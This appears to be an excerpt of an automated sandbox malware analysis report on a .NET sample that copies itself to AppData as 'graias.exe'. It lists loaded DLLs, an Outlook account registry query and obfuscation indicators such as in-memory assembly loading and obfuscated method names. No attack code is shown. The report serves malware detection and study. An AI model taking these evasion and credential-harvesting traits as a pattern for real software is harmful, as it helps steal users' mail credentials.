                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxdiagn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d11.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: d3d12.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: devobj.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winmmbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wmiclnt.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winbrand.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dsound.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: devrtl.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: spinf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: drvstore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: spfileq.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wifidisplay.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mmdevapi.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfplat.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rtworkq.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mf.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ksuser.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfperfhelper.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mfsensorgroup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: comppkgsup.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.media.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.applicationmodel.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: iGhDjzEiDU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: iGhDjzEiDU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.iGhDjzEiDU.exe.7940000.6.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.cs.Net Code: kkJatZJNv4 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.cs.Net Code: kkJatZJNv4 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.iGhDjzEiDU.exe.33d9654.0.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 6.2.graias.exe.2e09748.2.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0552B200 push eax; retf 0_2_0552B319
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0797E19D push 8B000001h; iretd 0_2_0797E1CC
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 0_2_0797E1D7 push 8B000001h; iretd 0_2_0797E1DD
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00434006 push ecx; ret 5_2_00434019
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004567F0 push eax; ret 5_2_0045680E
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00455EBF push ecx; ret 5_2_00455ED2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_0291B200 push eax; retf 6_2_0291B319
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0C8B0 push es; ret 6_2_06D0C8C0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0E1D7 push 8B000001h; iretd 6_2_06D0E1DD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06D0E19D push 8B000001h; iretd 6_2_06D0E1CC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E07EE8 push esp; retf 6_2_06E07EF5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E003B8 push eax; ret 6_2_06E003B9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E07F80 pushfd ; retf 6_2_06E07F8D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 6_2_06E069A9 pushad ; retf 6_2_06E069B5
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_10002806 push ecx; ret 8_2_10002819
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_10009FD8 push esi; ret 8_2_10009FD9
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044693D push ecx; ret 38_2_0044694D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044DB70 push eax; ret 38_2_0044DB84
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0044DB70 push eax; ret 38_2_0044DBAC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00451D54 push eax; ret 38_2_00451D61
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044B090 push eax; ret 39_2_0044B0A4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_0044B090 push eax; ret 39_2_0044B0CC
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00444E71 push ecx; ret 39_2_00444E81
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00414060 push eax; ret 41_2_00414074
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00414060 push eax; ret 41_2_0041409C
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00414039 push ecx; ret 41_2_00414049
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_004164EB push 0000006Ah; retf 41_2_004165C4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00416553 push 0000006Ah; retf 41_2_004165C4
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00416555 push 0000006Ah; retf 41_2_004165C4
                Source: iGhDjzEiDU.exeStatic PE information: section name: .text entropy: 7.85185407933489
                Source: graias.exe.5.drStatic PE information: section name: .text entropy: 7.85185407933489
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, KsWaPvY6iMkFaFMqkR.csHigh entropy of concatenated method names: 'Dispose', 'RaE1DET5eZ', 'mFiHVS7Nkf', 'tOv8Sfr0Bu', 'rmX1opAG1K', 'huw1zye41K', 'ProcessDialogKey', 'HHBH0YEfDO', 'HqWH1lx3E1', 'bQ7HHXoIey'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, ISax0UGT6r9T28RYAO.csHigh entropy of concatenated method names: 'I3fc2i9nvL', 'OnvcJAeYSL', 'pr1ct6ebDa', 'qL1c7FVf1B', 'qKccE2CF6V', 'amtcS3XqdL', 'RWjcvsXoa4', 'wK0cQna2hg', 'GCYcLCexat', 'Cc0cXwYLbv'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, TcFXyGaNoLGVFHtkq0.csHigh entropy of concatenated method names: 'mEI1cirEpT', 'V4A1KEyLHD', 'HXf1xq0PeF', 'qWs163UEQb', 'zSr1IiPy3h', 'YAF1ytn9ui', 'ptWT28AKfgnuTGOjHu', 'BiBBHQ6UxLYlWm4UAX', 'FLv11ZCRg4', 'R4M1fDx9FU'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, GY0wQ6K1nUpCqMVFnw.csHigh entropy of concatenated method names: 'AEPfnHer6t', 'MJdfFJEvup', 'ITBfYKTtEy', 'S0Of50C1uj', 'Y0BfPWq66m', 'FNdfCFDKDl', 'iUQfcExu0H', 'rg2fKMehIO', 'LPhfB3Du4t', 'pFrfxTUOys'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oirEpTQk4AEyLHDkvV.csHigh entropy of concatenated method names: 'C6FYh5MNiq', 'IvvYjTrBxL', 'BoMYqYVEHh', 'uq2YwAjpuj', 'yPpYU6Sew4', 'TX4Y9Sy8gm', 'kq2YkOH4Yl', 'fvEYdNOwUg', 'ttOYDkNP0y', 'LcQYotSVrQ'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, yUNEYV11fRq26bsPudC.csHigh entropy of concatenated method names: 'JLLioc94EI', 'BJLizcnH2u', 'lEvA0PirD8', 'kuoA1PDOH0', 'omBAHBdKdB', 'LesAfV7dU5', 'GIRAaUBJ1x', 'FTOAnIOJbV', 'kMoAFARjRR', 'v9FAYndEnU'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, FoIey2oob8woPkHgxe.csHigh entropy of concatenated method names: 'juYi5KlJ4i', 'o44iPVpbMV', 'DypiChV5u1', 'vwyicqyw8t', 'HZpibCdgkO', 'cwRiK7jLE5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, CXF3dbOvOPd1Ho0I5P.csHigh entropy of concatenated method names: 'cOTRQv66sl', 'fccRLw4QQn', 'bB6RZfcJDN', 'iTTRV6CaSh', 'FCwRernfdH', 'KuQR3OTIM1', 'nfBRr5vONF', 'TjORmGPuGD', 'KMlRTyU85x', 'XGwRpNyUY5'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, TEQbsVXqVBlwj7SriP.csHigh entropy of concatenated method names: 'ornPE5vnCX', 'Qo8Pvcr1au', 'GWL5uYa3Ia', 'l0q5ee8Rc5', 'OkX53gJkgf', 'LP35NU6DtG', 'OHD5r4vvO1', 'UGD5muM35A', 'lqr5Gg37Ig', 'uGf5TxxuY4'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, sL6QMr10ElDaIL5m1Yb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eRaipbQLj5', 'KWUiWopZwi', 'z8biOwmQ67', 'PU2ih0QFUf', 'qHIijc2vau', 'Bauiqcjc3W', 'EP7iwYeWVW'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, CFmuHgz2uGmCodnc7W.csHigh entropy of concatenated method names: 'YAIiS0arfP', 'OC5iQfi9dn', 'WQdiLj9wO0', 'tJZiZveKka', 'VYHiVIm9v9', 'nAnieNam4i', 'JPoi3idXG7', 'KXti4fK9hA', 'xIUi26yaed', 'xhdiJ6vNHR'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, p3hoAFZtn9uiwEtfKN.csHigh entropy of concatenated method names: 'RNXCnJGTyk', 'QHECYGqyOs', 'ar6CPcoWNM', 'zHYCc0nWBF', 'LKaCKwrj56', 'oIkPU9ZU0L', 'hESP9O2J0K', 'arbPkqvrC7', 'dg8Pdx294o', 'c9PPDwQO1B'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gyjADuLXfq0PeFsWs3.csHigh entropy of concatenated method names: 'qXa57AUKsP', 'X8b5SX3S8P', 'D4e5Qui8rs', 'qal5LYEuXZ', 'YZS5IM8QUF', 'coY5yLO0Ck', 'Dji5sJRCEC', 'Swn5gU3Y1B', 'mSx5bjF3qG', 'tuT5ioAkbN'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, tkV5WJwR3JlKYuw1Ej.csHigh entropy of concatenated method names: 'i13sxxg6ye', 'UAVs6J3jGf', 'ToString', 'dbasFI3BwU', 'rinsYdeWB0', 'Tf5s5mM5S2', 'MjjsPa6l1u', 'zLosCVjQIU', 'pyBscPQmod', 'YMYsKVQPUq'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, kwsnHd3D9pAL148Rf1.csHigh entropy of concatenated method names: 'Ww7Cr9HDP4', 'JyXCGflTi1', 'o9bCNt1ek6', 'P6vF0u2qBx4QxnA3ypc', 'sBToKX2sXGUnADsyPYF', 'vn1peu2JbdLT0xPgfWw', 'aBU0bj25uZPwellOY9b'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gytIsVqF8MuD80NBw2.csHigh entropy of concatenated method names: 'ToString', 'B3ZypCGBEI', 'UR8yV8hA2f', 's8dyuu4h7x', 'Y0ZyeegDkT', 'KViy3klWnG', 'qrayNtstaX', 'C78yr3tCcQ', 'N3TymAgHAG', 'lQiyGZ8aVf'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, tEdNnMhdKHTbHQJoVm.csHigh entropy of concatenated method names: 'Gq7IT2NZHb', 'ltmIW0mRqy', 'DBoIhoCgwh', 'pE0Ij51JqK', 'mNpIV7k43K', 'Q4NIuFl2o8', 'Y37IeN6Ojp', 'rtRI3rsCam', 'H2xINubJte', 'uVFIrTSUCR'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, X8yytkHu8Bt1Puv27C.csHigh entropy of concatenated method names: 'b3rthX3x6', 'XvD71dNM5', 'nsrSV6jgQ', 'ckmvFVKmh', 'KNXL7DoN3', 'SNFXRtKA9', 'm1UPrMjudABTcAeQdC', 'ROeEnGwqnr0vnvXW64', 'oL6gqcnLb', 'Jd5ir5J6E'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, lYEfDODVqWlx3E11Q7.csHigh entropy of concatenated method names: 'LmrbZAovvH', 'SAdbVbiVyL', 'Ac2busbPge', 'AQCbe6rNkP', 'rN6b3pBW4s', 'Xp1bNK4Qlj', 'NtBbrupSXv', 'Oirbm8EG1p', 'FMMbG2N9R5', 'M9dbTB7Guj'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oeCGxP9hPhHPGyyRta.csHigh entropy of concatenated method names: 'gSSsdqGo6G', 'TBwso4h8y4', 'zoog03AtDp', 'eM4g1nnf9E', 'D6RspcoAxE', 'r18sWR0yaW', 'AZ7sOJUllt', 'FDcshYvoM7', 'PMUsjKT1fg', 'w0qsqMSvAD'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, l7uwjVkLYhaEET5eZg.csHigh entropy of concatenated method names: 'NOPbISmEgt', 'SqEbsaGFuc', 'ydEbbUTwDy', 'yQnbA06cqO', 'weVbMNqY8Z', 'dheb4Dn24b', 'Dispose', 'xprgFKONB6', 'D2hgYS5HIO', 'ePwg5uZIof'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, YHIc1t1agveHGox9DlV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FeJ8bLFk34', 'jBp8iI1EXi', 'TLF8AYB7lO', 'MvX88XLL9T', 'uYE8MjLSpx', 'GUK8l9Oiuc', 'KFa84hWtwZ'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, o8MKfyrc7cYmq4eBVV.csHigh entropy of concatenated method names: 'h3qcFprRJn', 'K88c5beY6q', 'UK3cCfNcyZ', 'YQeCoeDoyO', 'KlZCzgpIw6', 'lW4c05FZuf', 'nNhc1DSxVO', 'NiXcHQX0ae', 'ps3cf7Eoys', 'Qywcaj27OC'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, lrQBfVV0rfHwgJoiLc.csHigh entropy of concatenated method names: 'QxRD9x24HcpebWts3CO', 'zUuf1R2QGuCeiVxJAeX', 'oI2vLD2N9ki0sTnF8PY', 'MgGCgSkenW', 'XO1CbdnCJC', 'Fq7Ci4HLLp', 'G1Ziwk2oXKuyB5fhbHT', 'Vh3KG12FCYQHR4jRI22'
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, gT1bvP5O25dwYsGRwM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nw9HDdlXL2', 'wsLHoweiE9', 'p0ZHzaHnLQ', 'qUIf0i2bSK', 'vLff1k8hbP', 'q3bfHlOdCo', 'llhff7qIuu', 'CjGF87HPXZBAxrLWIub'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, KsWaPvY6iMkFaFMqkR.csHigh entropy of concatenated method names: 'Dispose', 'RaE1DET5eZ', 'mFiHVS7Nkf', 'tOv8Sfr0Bu', 'rmX1opAG1K', 'huw1zye41K', 'ProcessDialogKey', 'HHBH0YEfDO', 'HqWH1lx3E1', 'bQ7HHXoIey'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, ISax0UGT6r9T28RYAO.csHigh entropy of concatenated method names: 'I3fc2i9nvL', 'OnvcJAeYSL', 'pr1ct6ebDa', 'qL1c7FVf1B', 'qKccE2CF6V', 'amtcS3XqdL', 'RWjcvsXoa4', 'wK0cQna2hg', 'GCYcLCexat', 'Cc0cXwYLbv'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, TcFXyGaNoLGVFHtkq0.csHigh entropy of concatenated method names: 'mEI1cirEpT', 'V4A1KEyLHD', 'HXf1xq0PeF', 'qWs163UEQb', 'zSr1IiPy3h', 'YAF1ytn9ui', 'ptWT28AKfgnuTGOjHu', 'BiBBHQ6UxLYlWm4UAX', 'FLv11ZCRg4', 'R4M1fDx9FU'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csHigh entropy of concatenated method names: 'AEPfnHer6t', 'MJdfFJEvup', 'ITBfYKTtEy', 'S0Of50C1uj', 'Y0BfPWq66m', 'FNdfCFDKDl', 'iUQfcExu0H', 'rg2fKMehIO', 'LPhfB3Du4t', 'pFrfxTUOys'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oirEpTQk4AEyLHDkvV.csHigh entropy of concatenated method names: 'C6FYh5MNiq', 'IvvYjTrBxL', 'BoMYqYVEHh', 'uq2YwAjpuj', 'yPpYU6Sew4', 'TX4Y9Sy8gm', 'kq2YkOH4Yl', 'fvEYdNOwUg', 'ttOYDkNP0y', 'LcQYotSVrQ'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, yUNEYV11fRq26bsPudC.csHigh entropy of concatenated method names: 'JLLioc94EI', 'BJLizcnH2u', 'lEvA0PirD8', 'kuoA1PDOH0', 'omBAHBdKdB', 'LesAfV7dU5', 'GIRAaUBJ1x', 'FTOAnIOJbV', 'kMoAFARjRR', 'v9FAYndEnU'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, FoIey2oob8woPkHgxe.csHigh entropy of concatenated method names: 'juYi5KlJ4i', 'o44iPVpbMV', 'DypiChV5u1', 'vwyicqyw8t', 'HZpibCdgkO', 'cwRiK7jLE5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, CXF3dbOvOPd1Ho0I5P.csHigh entropy of concatenated method names: 'cOTRQv66sl', 'fccRLw4QQn', 'bB6RZfcJDN', 'iTTRV6CaSh', 'FCwRernfdH', 'KuQR3OTIM1', 'nfBRr5vONF', 'TjORmGPuGD', 'KMlRTyU85x', 'XGwRpNyUY5'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, TEQbsVXqVBlwj7SriP.csHigh entropy of concatenated method names: 'ornPE5vnCX', 'Qo8Pvcr1au', 'GWL5uYa3Ia', 'l0q5ee8Rc5', 'OkX53gJkgf', 'LP35NU6DtG', 'OHD5r4vvO1', 'UGD5muM35A', 'lqr5Gg37Ig', 'uGf5TxxuY4'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, sL6QMr10ElDaIL5m1Yb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eRaipbQLj5', 'KWUiWopZwi', 'z8biOwmQ67', 'PU2ih0QFUf', 'qHIijc2vau', 'Bauiqcjc3W', 'EP7iwYeWVW'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, CFmuHgz2uGmCodnc7W.csHigh entropy of concatenated method names: 'YAIiS0arfP', 'OC5iQfi9dn', 'WQdiLj9wO0', 'tJZiZveKka', 'VYHiVIm9v9', 'nAnieNam4i', 'JPoi3idXG7', 'KXti4fK9hA', 'xIUi26yaed', 'xhdiJ6vNHR'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, p3hoAFZtn9uiwEtfKN.csHigh entropy of concatenated method names: 'RNXCnJGTyk', 'QHECYGqyOs', 'ar6CPcoWNM', 'zHYCc0nWBF', 'LKaCKwrj56', 'oIkPU9ZU0L', 'hESP9O2J0K', 'arbPkqvrC7', 'dg8Pdx294o', 'c9PPDwQO1B'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gyjADuLXfq0PeFsWs3.csHigh entropy of concatenated method names: 'qXa57AUKsP', 'X8b5SX3S8P', 'D4e5Qui8rs', 'qal5LYEuXZ', 'YZS5IM8QUF', 'coY5yLO0Ck', 'Dji5sJRCEC', 'Swn5gU3Y1B', 'mSx5bjF3qG', 'tuT5ioAkbN'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, tkV5WJwR3JlKYuw1Ej.csHigh entropy of concatenated method names: 'i13sxxg6ye', 'UAVs6J3jGf', 'ToString', 'dbasFI3BwU', 'rinsYdeWB0', 'Tf5s5mM5S2', 'MjjsPa6l1u', 'zLosCVjQIU', 'pyBscPQmod', 'YMYsKVQPUq'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, kwsnHd3D9pAL148Rf1.csHigh entropy of concatenated method names: 'Ww7Cr9HDP4', 'JyXCGflTi1', 'o9bCNt1ek6', 'P6vF0u2qBx4QxnA3ypc', 'sBToKX2sXGUnADsyPYF', 'vn1peu2JbdLT0xPgfWw', 'aBU0bj25uZPwellOY9b'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, gytIsVqF8MuD80NBw2.csHigh entropy of concatenated method names: 'ToString', 'B3ZypCGBEI', 'UR8yV8hA2f', 's8dyuu4h7x', 'Y0ZyeegDkT', 'KViy3klWnG', 'qrayNtstaX', 'C78yr3tCcQ', 'N3TymAgHAG', 'lQiyGZ8aVf'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, tEdNnMhdKHTbHQJoVm.csHigh entropy of concatenated method names: 'Gq7IT2NZHb', 'ltmIW0mRqy', 'DBoIhoCgwh', 'pE0Ij51JqK', 'mNpIV7k43K', 'Q4NIuFl2o8', 'Y37IeN6Ojp', 'rtRI3rsCam', 'H2xINubJte', 'uVFIrTSUCR'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, X8yytkHu8Bt1Puv27C.csHigh entropy of concatenated method names: 'b3rthX3x6', 'XvD71dNM5', 'nsrSV6jgQ', 'ckmvFVKmh', 'KNXL7DoN3', 'SNFXRtKA9', 'm1UPrMjudABTcAeQdC', 'ROeEnGwqnr0vnvXW64', 'oL6gqcnLb', 'Jd5ir5J6E'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, lYEfDODVqWlx3E11Q7.csHigh entropy of concatenated method names: 'LmrbZAovvH', 'SAdbVbiVyL', 'Ac2busbPge', 'AQCbe6rNkP', 'rN6b3pBW4s', 'Xp1bNK4Qlj', 'NtBbrupSXv', 'Oirbm8EG1p', 'FMMbG2N9R5', 'M9dbTB7Guj'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, oeCGxP9hPhHPGyyRta.csHigh entropy of concatenated method names: 'gSSsdqGo6G', 'TBwso4h8y4', 'zoog03AtDp', 'eM4g1nnf9E', 'D6RspcoAxE', 'r18sWR0yaW', 'AZ7sOJUllt', 'FDcshYvoM7', 'PMUsjKT1fg', 'w0qsqMSvAD'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, l7uwjVkLYhaEET5eZg.csHigh entropy of concatenated method names: 'NOPbISmEgt', 'SqEbsaGFuc', 'ydEbbUTwDy', 'yQnbA06cqO', 'weVbMNqY8Z', 'dheb4Dn24b', 'Dispose', 'xprgFKONB6', 'D2hgYS5HIO', 'ePwg5uZIof'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, YHIc1t1agveHGox9DlV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FeJ8bLFk34', 'jBp8iI1EXi', 'TLF8AYB7lO', 'MvX88XLL9T', 'uYE8MjLSpx', 'GUK8l9Oiuc', 'KFa84hWtwZ'
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, o8MKfyrc7cYmq4eBVV.csHigh entropy of concatenated method names: 'h3qcFprRJn', 'K88c5beY6q', 'UK3cCfNcyZ', 'YQeCoeDoyO', 'KlZCzgpIw6', 'lW4c05FZuf', 'nNhc1DSxVO', 'NiXcHQX0ae', 'ps3cf7Eoys', 'Qywcaj27OC'
